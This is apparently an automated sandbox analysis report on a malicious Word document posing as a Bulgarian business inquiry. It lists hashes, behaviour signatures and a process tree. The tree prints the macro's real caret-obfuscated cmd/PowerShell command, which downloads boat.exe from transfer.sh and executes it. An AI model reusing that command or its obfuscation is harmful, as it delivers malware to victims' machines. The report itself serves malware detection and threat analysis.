Analysis

  • max time kernel
    122s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    14-09-2023 15:17

General

  • Target

    Zapitvane_MACH_BULGARIA_EOOD_09_2023.doc

  • Size

    199KB

  • MD5

    3b92906782599469acffd05ba041942e

  • SHA1

    522183445616d131f3edf13e6ea93c9f19c9f52f

  • SHA256

    edce16eadba8d19990b2ff2e97420f07c1f4defe813ffe961f9cd777f8368b7b

  • SHA512

    c1f8a1259327db79f98467d2a9e2dce172c39e78541476722863eb7b6fa5c39f41c39ad574e7e0b65ed4ab0d8a7201665df1463f2aeaa2d456634c94e71e0f33

  • SSDEEP

    3072:NAN+svPwMrFoXiURMf8yS/TSTIs6sCbMD3itIm0QqgxJi+m:W33JodRU8yS/dLsZDyp0QZC

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Zapitvane_MACH_BULGARIA_EOOD_09_2023.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2604
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/gj04sqKk7O/boat.e^xe -o C:\Users\Public\ggxnw.exe;C:\Users\Public\ggxnw.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2576
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell /W 01 curl https://transfer.sh/get/gj04sqKk7O/boat.exe -o C:\Users\Public\ggxnw.exe;C:\Users\Public\ggxnw.exe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2584
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:564

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      6736b6fc463ec8904bfdf669156e1d90

      SHA1

      e9b19394614743875e2ffb0f4fd31b2af371d737

      SHA256

      c8b52d0e2b5b628f35ce580c887024252f1ed15f6219f616892ad035fd63dfb4

      SHA512

      692f334581a6ddc8b56ec1d30efdb45b1ba1ecb134124b973fb370f4ca41eab94ec40155a89b3183c2e38448794b9b82c3d203c0a2a347e313fac656d798d283

    • memory/2584-15-0x000000006B260000-0x000000006B80B000-memory.dmp
      Filesize

      5.7MB

    • memory/2584-20-0x000000006B260000-0x000000006B80B000-memory.dmp
      Filesize

      5.7MB

    • memory/2584-12-0x0000000002240000-0x0000000002280000-memory.dmp
      Filesize

      256KB

    • memory/2584-13-0x0000000002240000-0x0000000002280000-memory.dmp
      Filesize

      256KB

    • memory/2584-14-0x0000000002240000-0x0000000002280000-memory.dmp
      Filesize

      256KB

    • memory/2584-11-0x000000006B260000-0x000000006B80B000-memory.dmp
      Filesize

      5.7MB

    • memory/2604-6-0x0000000000630000-0x0000000000730000-memory.dmp
      Filesize

      1024KB

    • memory/2604-7-0x0000000000630000-0x0000000000730000-memory.dmp
      Filesize

      1024KB

    • memory/2604-0-0x000000002F220000-0x000000002F37D000-memory.dmp
      Filesize

      1.4MB

    • memory/2604-5-0x0000000000630000-0x0000000000730000-memory.dmp
      Filesize

      1024KB

    • memory/2604-2-0x000000007196D000-0x0000000071978000-memory.dmp
      Filesize

      44KB

    • memory/2604-21-0x000000002F220000-0x000000002F37D000-memory.dmp
      Filesize

      1.4MB

    • memory/2604-22-0x000000007196D000-0x0000000071978000-memory.dmp
      Filesize

      44KB

    • memory/2604-23-0x0000000000630000-0x0000000000730000-memory.dmp
      Filesize

      1024KB

    • memory/2604-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2604-42-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2604-43-0x000000007196D000-0x0000000071978000-memory.dmp
      Filesize

      44KB

    • memory/2604-44-0x0000000000630000-0x0000000000730000-memory.dmp
      Filesize

      1024KB